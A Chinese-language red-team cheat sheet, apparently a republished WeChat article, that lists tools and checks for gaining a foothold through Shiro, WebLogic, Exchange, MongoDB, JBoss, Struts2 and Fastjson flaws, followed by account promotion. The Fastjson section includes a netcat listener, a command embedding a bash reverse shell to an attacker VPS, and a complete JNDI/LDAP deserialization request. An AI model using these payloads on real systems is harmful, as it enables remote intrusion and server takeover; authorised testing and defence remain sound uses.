目录
Shiro反序列化
Weblogic 反序列化漏洞
Exchange RCE
MongoDB 未授权访问
Jboss RCE
Struct2
Fastjson反序列化
Shiro反序列化
(1)常规情况下通过登录框、页面或wappalyzer确定为Java语言后,使用shiro_too.jar来确定是否为shiro。若为shiro,加载大量的txt来跑出key,接着使用ShiroExploit-v2.3.jar执行命令或者写入内存马。java -jar shiro_too.jar https://xxx.com/xx/ keys=/xxx/shiro_keys.txt
(2)burpsuite加载被动扫描shiro的插件https://github.com/pmiaowu/BurpShiroPassiveScan
登录框最好要尝试登录如然后抓包,有时候登录界面没有,跳转后的post接口认证存在。
Weblogic 反序列化漏洞
weblogic 一般开放的端口为7001、7002
工具:https://github.com/rabbitmask/WeblogicScan https://github.com/0xn0ne/weblogicScanner
图形化工具:weblogic_exploit-1.0-SNAPSHOT-all.jar
Exchange RCE
工具:https://github.com/jeningogo/exchange-ssrf-rce
MongoDB 未授权访问
工具:https://github.com/se55i0n/DBScanner
此工具用来扫描常见的未授权访问
Jboss RCE
参考大佬文章:https://github.com/joaomatosf/JavaDeserH2HC
JBoss 5.x/6.x 反序列化漏洞( CVE-2017-12149 )
访问/invoker/readonly,如果返回 500 ,说明页面存在,此页面存在反序列化漏洞。
工具:
Struct2
工具:https://github.com/x51/STS2G
Fastjson反序列化
工具:https://github.com/wyzxxz/fastjson_rce_tool
nc lvp 4444
java -cp fastjson_tool.jar fastjson.HLDAPServer your_vps_ip port "bash=/bin/bash -i >& /dev/tcp/your_vps_ip/4444 0>&1"
POST / HTTP/1.1
Host: 192.168.255.132:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 193
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.255.135:8888/Object","autoCommit":true}}
本文作者:jax, 转载请注明来自FreeBuf.COM
【Hacking黑白红】,一线渗透攻防实战交流公众号
回复“电子书”获取web渗透、CTF电子书:
回复“视频教程”获取渗透测试视频教程;
回复“内网书籍”获取内网学习书籍;
回复“CTF工具”获取渗透、CTF全套工具;
回复“内网渗透”;获取内网渗透资料;
回复“护网”;获取护网学习资料 ;
回复“python”,获取python视频教程;
回复“java”,获取Java视频教程;
回复“go”,获取go视频教程
知识星球
【Hacking藏经阁】知识星球致力于分享技术和认知。
1、技术方面。主攻渗透测试(web和内网)、CTF比赛、逆向、护网行动等;
400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)
2、认知方面。副业经营、人设IP打造,具体点公众号运营、抖*yin等自媒体运营(目前主要在运营两个平台4个号)。
如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长。
欢迎加入99米/年,平均每天2毛7分钱,学习网络安全一整年。
▶【渗透实战系列】51|- 一次BC站点的GetShell过程
▶【渗透实战系列】50|- Log4j打点后与管理员斗智斗勇
▶【渗透实战系列】49|-实战某高校的一次挖矿病毒的应急处置
▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell
▶【渗透实战系列】|44-记一次授权渗透实战(过程曲折,Java getshell)
▶【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战
▶【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)
▶【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透
▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP
▶【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站
▶【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)
▶【渗透实战系列】|29-实战|对某勒索APP的Getshell
▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)
▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程
▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法
▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)
▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell
▶【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点
▶【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局
▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)
▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)
▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)
▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)
点分享
点收藏
点点赞
点在看
原文始发于微信公众号(Hacking黑白红):红蓝对抗外网打点技巧总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论